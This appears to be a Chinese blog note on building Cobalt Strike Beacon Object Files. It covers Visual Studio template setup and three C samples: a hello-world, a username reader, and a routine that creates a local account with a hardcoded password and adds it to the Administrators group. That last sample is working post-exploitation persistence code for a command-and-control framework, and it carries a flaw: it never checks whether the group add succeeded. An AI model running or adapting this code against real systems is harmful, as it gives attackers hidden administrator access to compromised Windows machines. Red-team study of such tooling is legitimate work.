CS BOF知识

模版导入

BOF模版文件
https://github.com/securifybv/Visual-Studio-BOF-template
把模版文件放入
C:\Users\test\Documents\Visual Studio 2022\Templates\ProjectTemplates\
目录下

选中bof直接编译即可

代码文件

测试弹窗

#include "bofdefs.h"

extern "C" {

#ifdef BOF
    void go(char* buff, int len) {
        BeaconPrintf(CALLBACK_OUTPUT, "Hello, World!");
#endif
    }

}
#ifndef BOF

void main(int argc, char* argv[]) {

    go(NULL, 0);
}

#endif

用户名

#include <windows.h>
#include <stdio.h>
#include "bofdefs.h"



#pragma region error_handling
#define print_error(msg, hr) _print_error(__FUNCTION__, __LINE__, msg, hr)
BOOL _print_error(char* func, int line,  char* msg, HRESULT hr) {
#ifdef BOF
	BeaconPrintf(CALLBACK_ERROR, "(%s at %d): %s 0x%08lx", func, line,  msg, hr);
#else
	printf("[-] (%s at %d): %s 0x%08lx", func, line, msg, hr);
#endif // BOF

	return FALSE;
}
#pragma endregion
DECLSPEC_IMPORT DWORD WINAPI ADVAPI32$GetUserNameA(LPSTR, LPDWORD);
DECLSPEC_IMPORT DWORD WINAPI User32$MessageBoxA(HWND, LPCSTR, LPCSTR, UINT);

#ifdef BOF
void go(char* buff, int len) {
	char username[1024];
	DWORD usernameLength = sizeof username;
	ADVAPI32$GetUserNameA(username, &usernameLength);
	BeaconPrintf(CALLBACK_OUTPUT, "当前用户名为:%s", username);
	User32$MessageBoxA(0, 0, 0, 0);
}


#else

void main(int argc, char* argv[]) {
	
}

#endif

添加用户

#include <windows.h>
#include <lm.h>
#include <stdio.h>
#include "bofdefs.h"

#pragma region error_handling
#define print_error(msg, hr) _print_error(__FUNCTION__, __LINE__, msg, hr)
BOOL _print_error(char* func, int line, char* msg, HRESULT hr) {
#ifdef BOF
    BeaconPrintf(CALLBACK_ERROR, "(%s at %d): %s 0x%08lx", func, line, msg, hr);
#else
    printf("[-] (%s at %d): %s 0x%08lx", func, line, msg, hr);
#endif // BOF

    return FALSE;
}
#pragma endregion
DECLSPEC_IMPORT NET_API_STATUS WINAPI NETAPI32$NetUserAdd(LPWSTR, DWORD, PBYTE, PDWORD);
DECLSPEC_IMPORT NET_API_STATUS WINAPI NETAPI32$NetLocalGroupAddMembers(LPCWSTR, LPCWSTR, DWORD, PBYTE, DWORD);

#ifdef BOF
void go(char* buff, int len) {
    if (!BeaconIsAdmin()) {
        BeaconPrintf(CALLBACK_OUTPUT, "非管理权限");
        return;
    }
    LPCWSTR username = L"sanfortest";
    LPCWSTR password = L"san!@#123";
    USER_INFO_1 ui;
    DWORD dwLevel = 1;
    DWORD dwError = 0;
    ZeroMemory(&ui, sizeof(ui));
    ui.usri1_name = (LPWSTR)username;
    ui.usri1_password = (LPWSTR)password;
    ui.usri1_priv = USER_PRIV_USER;
    ui.usri1_home_dir = NULL;
    ui.usri1_comment = NULL;
    ui.usri1_flags = UF_SCRIPT | UF_DONT_EXPIRE_PASSWD;
    ui.usri1_script_path = NULL;
    NET_API_STATUS nStatus = NETAPI32$NetUserAdd(NULL, dwLevel, (LPBYTE)&ui, &dwError);
    if (nStatus == NERR_Success) {
        LOCALGROUP_MEMBERS_INFO_3 account;
        account.lgrmi3_domainandname = (LPWSTR)username;
        NET_API_STATUS aStatus = NETAPI32$NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1);
        if (nStatus == NERR_Success) {
            BeaconPrintf(CALLBACK_OUTPUT, " %ls 用户、管理员组添加成功\n", username);
            BeaconPrintf(CALLBACK_OUTPUT, "用户名: %ls,密码:%ls\n", username, password);
        }
        else {
            BeaconPrintf(CALLBACK_OUTPUT, "用户 %ls 管理员组添加失败", username);
        }
    }
    else {
        BeaconPrintf(CALLBACK_OUTPUT, "User added error %d", nStatus);
    }
}

#else

void main(int argc, char* argv[]) {

}

#endif

参考链接
https://cn-sec.com/archives/2250195.html